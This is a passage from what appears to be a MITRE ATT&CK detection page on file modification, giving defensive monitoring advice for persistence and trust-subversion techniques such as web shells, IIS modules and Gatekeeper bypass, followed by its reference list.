Monitor for changes made to systemd timer unit files for unexpected modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links

Enterprise T1505 Server Software Component

Monitor for changes made to files that may abuse legitimate extensible development features of servers to establish persistent access to systems.

.003 Web Shell

Monitor for changes made to files that may backdoor web servers with web shells to establish persistent access to systems.

.004 IIS Components

Monitor for modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\system32\inetsrv\config\applicationhost.config could indicate an IIS module installation.[39][40]

.005 Terminal Services DLL

Monitor unexpected changes and/or interactions with termsrv.dll, which is typically stored in %SystemRoot%\System32\.

Enterprise T1489 Service Stop

Monitor for changes made to files that may stop or disable services on a system to render those services unavailable to legitimate users.

ICS T0881 Service Stop

Monitor for changes made to files that may stop or disable services on a system to render those services unavailable to legitimate users.

Enterprise T1553 Subvert Trust Controls

Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.[41] Also analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure "Hide Microsoft Entries" and "Hide Windows Entries" are both deselected.[41]

On macOS, the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Also monitor software update frameworks that may strip this flag when performing updates.

.001 Gatekeeper Bypass

The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Also monitor software update frameworks that may strip this flag when performing updates.

.003 SIP and Trust Provider Hijacking

Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.[41] Also analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure "Hide Microsoft Entries" and "Hide Windows Entries" are both deselected.[41]

Enterprise T1569 System Services

Monitor for changes made to files that may abuse system services or daemons to execute commands or programs.

.001 Launchctl

Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. Launch Agent or Launch Daemon with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious.

Enterprise T1080 Taint Shared Content

Monitor for files that write or overwrite many files to a network shared directory may be suspicious.

Enterprise T1600 Weaken Encryption

File Modification

.001 Reduce Key Space

There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as Modify System Image and Network Device CLI. Some detection methods require vendor support to aid in investigation.

.002 Disable Crypto Hardware

There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as Modify System Image and Network Device CLI. Some detection methods require vendor support to aid in investigation.

References

  1. Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.
  2. Chrome Enterprise and Education Help. (n.d.). Use Chrome Browser with Roaming User Profiles. Retrieved March 28, 2023.
  3. Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020.
  4. ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.
  5. Schroeder, W. & Christensen, L. (2021, June 22). Certified Pre-Owned - Abusing Active Directory Certificate Services. Retrieved August 2, 2022.
  6. Syynimaa, N. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved August 3, 2022.
  7. French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.
  8. French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger Than Its Weakest LNK. Retrieved November 30, 2020.
  9. Apple. (n.d.). Open items automatically when you log in on Mac. Retrieved October 1, 2021.
  10. hoakley. (2021, September 16). How to run an app or tool at startup. Retrieved October 5, 2021.
  11. Patrick Wardle. (2018, July 23). Block Blocking Login Items. Retrieved October 1, 2021.
  12. Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.
  13. Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.
  14. Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.
  15. NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.
  16. Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.
  17. Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.
  18. Li, V. (2019, October 2). Polyglot Files: a Hacker’s best friend. Retrieved September 27, 2022.
  19. Kessler, G. (2022, December 9). GCK'S FILE SIGNATURES TABLE. Retrieved August 23, 2022.
  20. Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August 22, 2022.
  21. Choi, S. (2015, August 6). Obfuscated API Functions in Modern Packers. Retrieved August 22, 2022.
  1. Jason (jxb5151). (2021, January 28). findapihash.py. Retrieved August 22, 2022.
  2. Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.
  3. Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelgänging. Retrieved December 20, 2017.
  4. hasherezade. (2017, December 18). Process Doppelgänging – a new way to impersonate a process. Retrieved December 20, 2017.
  5. hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.
  6. Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
  7. Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
  8. Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.
  9. Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.
  10. Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.
  11. Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.
  12. Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.
  13. Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.
  14. Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.
  15. Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
  16. Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.
  17. Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.
  18. Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.
  19. Hromcová, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.
  20. Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.